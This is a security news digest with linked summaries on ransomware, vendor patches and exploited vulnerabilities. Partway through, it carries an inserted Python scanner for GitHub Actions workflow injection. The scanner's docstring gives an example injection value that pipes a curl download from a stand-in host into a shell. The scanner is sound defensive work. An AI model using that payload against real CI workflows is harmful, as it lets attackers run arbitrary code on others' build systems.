Daily summary - 17.07.2025

End-of-Day report

Timeframe: Wednesday 16-07-2025 18:00 - Thursday 17-07-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a

News

KAWA4096's Ransomware Tide: Rising Threat With Borrowed Styles

KAWA4096, a ransomware whose name includes "Kawa", the Japanese word for "river", first emerged in June 2025. This new threat features a leak site that follows the style of the Akira ransomware group, and a ransom note format similar to Qilin's, likely an attempt to borrow visibility and credibility from established groups. In this blog ..

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/kawa4096s-ransomware-tide-rising-threat-with-borrowed-styles/

Oracle: 309 security updates for products of every kind

For its July Critical Patch Update, Oracle has announced 309 security fixes. Dozens of products are affected.

https://www.heise.de/news/Oracle-309-Sicherheitsupdates-fuer-alle-moeglichen-Produkte-10490492.html

Cisco: security vulnerabilities in several products

Cisco ISE has yet another vulnerability with the maximum severity rating. Cisco is also warning of further vulnerabilities in additional products.

https://www.heise.de/news/Weitere-kritische-Luecke-in-Ciscos-ISE-10490589.html

Trump releases one billion dollars for offensive cyber operations

Exactly how the money is to be spent is not known. The focus is, however, likely to be on China.

https://www.derstandard.at/story/3000000279549/trump-gibt-eine-milliarde-dollar-fuer-offensive-cyberoperationen-frei

Google spots tailored backdoor malware aimed at SonicWall appliances

Google researchers reported on a malware campaign against end-of-life SonicWall appliances, noting that the attackers were good at covering their tracks.

https://therecord.media/sonicwall-sma-100-series-overstep-malware-unc6148

Detection Engineering: Practicing Detection-as-Code - Repository - Part 2

This is the second part of the Practicing Detection-as-Code series, where we will cover some basic elements of designing a repository to develop, store, and deploy detections from. We'll go through several different aspects of the setup, such as the Git platform, branch strategy, repository structure, detection structure, taxonomies, and content packs.

https://blog.nviso.eu/2025/07/17/detection-engineering-practicing-detection-as-code-repository-part-2/

Exploitation of CitrixBleed 2 (CVE-2025-5777) Began Before PoC Was Public

GreyNoise has observed active exploitation attempts against CVE-2025-5777 (CitrixBleed 2), an out-of-bounds memory read vulnerability in Citrix NetScaler. Exploitation began on June 23, nearly two weeks before a public proof-of-concept was released on July 4.

https://www.greynoise.io/blog/exploitation-citrixbleed-2-cve-2025-5777-before-public-poc

Flaw in Signal App Clone Could Leak Passwords - GreyNoise Identifies Active Reconnaissance and Exploit Attempts

A vulnerability disclosed in May 2025, CVE-2025-48927, affects certain deployments of TeleMessage TM SGNL. If the affected endpoint is exposed, it can return a full snapshot of heap memory, which may include plaintext usernames, passwords, and other sensitive data.

https://www.greynoise.io/blog/active-exploit-attempts-signal-based-messaging-app

How to catch GitHub Actions workflow injections before attackers do

Strengthen your repositories against Actions workflow injections, one of the most common vulnerability classes in CI workflows: untrusted event data (issue titles, PR branch names, comment bodies) expanded with ${{ ... }} directly inside a run: script.

https://github.blog/security/vulnerability-research/how-to-catch-github-actions-workflow-injections-before-attackers-do/
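As an added illustration of the "catch it before attackers do" idea, not code from the GitHub blog post, the following scanner flags ${{ ... }} expressions that reference attacker-controllable event fields inside run: steps of a workflow file. The list of untrusted contexts is an assumption of this example (a subset of the well-known ones), the sample workflow is constructed, and the safe variant shows the usual fix: pass the value through env: and reference it as a shell variable, so the shell treats it as data rather than as part of the script text.

```python
"""Added example (not from the GitHub blog post): a small scanner for
GitHub Actions workflow injection.

The vulnerable pattern is an attacker-controlled expression such as
${{ github.event.issue.title }} expanded directly inside a `run:` script.
GitHub substitutes the value into the script text before the shell runs
it, so a title like `"; curl http://x | sh; echo "` executes commands.
The safe form passes the value via `env:` and uses "$TITLE" in the script.
"""
import re

# Event fields an outside contributor can influence. Assumption of this
# example: a subset of the commonly cited untrusted contexts, not exhaustive.
UNTRUSTED_PATTERNS = [
    r"github\.event\.issue\.title",
    r"github\.event\.issue\.body",
    r"github\.event\.pull_request\.title",
    r"github\.event\.pull_request\.body",
    r"github\.event\.pull_request\.head\.ref",
    r"github\.event\.pull_request\.head\.repo\.",
    r"github\.event\.comment\.body",
    r"github\.event\.review\.body",
    r"github\.event\.review_comment\.body",
    r"github\.event\.commits\.",
    r"github\.event\.head_commit\.message",
    r"github\.event\.head_commit\.author\.",
    r"github\.event\.workflow_run\.head_branch",
    r"github\.head_ref",
]
UNTRUSTED_RE = re.compile("|".join(UNTRUSTED_PATTERNS))
EXPR_RE = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
RUN_RE = re.compile(r"(-\s+)?run:\s*(.*)")


def find_injections(workflow_text):
    """Return [(line_no, expression), ...] for untrusted expressions that
    appear inside a `run:` value (single-line or block scalar).

    Line-based YAML handling on purpose: it needs no parser dependency and
    block scalars are recognised by indentation relative to the `run:` key.
    """
    findings = []
    in_run = False
    run_indent = -1
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if not stripped or stripped.startswith("#"):
            continue
        m = RUN_RE.match(stripped)
        if m:
            in_run = True
            # Indentation of the `run` key itself (after an optional "- ").
            run_indent = indent + (len(m.group(1)) if m.group(1) else 0)
            body = m.group(2)
        elif in_run and indent > run_indent:
            body = stripped  # continuation line of a block scalar
        else:
            in_run = False
            continue
        for expr in EXPR_RE.findall(body):
            if UNTRUSTED_RE.search(expr):
                findings.append((lineno, expr))
    return findings


# Constructed sample: step one is injectable, step two is the hardened form.
VULNERABLE = """\
name: triage
on:
  issues:
    types: [opened]
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - name: Echo title (vulnerable)
        run: |
          echo "New issue: ${{ github.event.issue.title }}"
          echo "Actor: ${{ github.actor }}"
      - name: Safe via env
        env:
          TITLE: ${{ github.event.issue.title }}
        run: echo "New issue: $TITLE"
"""

if __name__ == "__main__":
    for lineno, expr in find_injections(VULNERABLE):
        print(f"line {lineno}: untrusted expression in run: step: {expr}")
```

Only the first step is reported: the env: assignment on the hardened step also contains the expression, but there GitHub places the value in an environment variable and the shell never parses it as code. Expressions passed to inputs of actions (for example a script: input) are a separate sink this line-based check does not cover.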

Vulnerabilities

Security updates for Thursday

Security updates have been issued by AlmaLinux (emacs, java-17-openjdk, kernel, kernel-rt, microcode_ctl, python3.11-setuptools, python3.12-setuptools, and socat), Debian (gnutls28), Fedora (vim), Red Hat (java-1.8.0-ibm), Slackware (bind), SUSE (docker, erlang, erlang26, ggml-devel-5889, gnuplot, kernel, kubernetes1.27, libQt6Concurrent6, mailman3, and transfig), and Ubuntu (apache2, bind9, linux-iot, linux-lowlatency-hwe-6.11, linux-raspi, and linux-raspi-5.4).

https://lwn.net/Articles/1030256/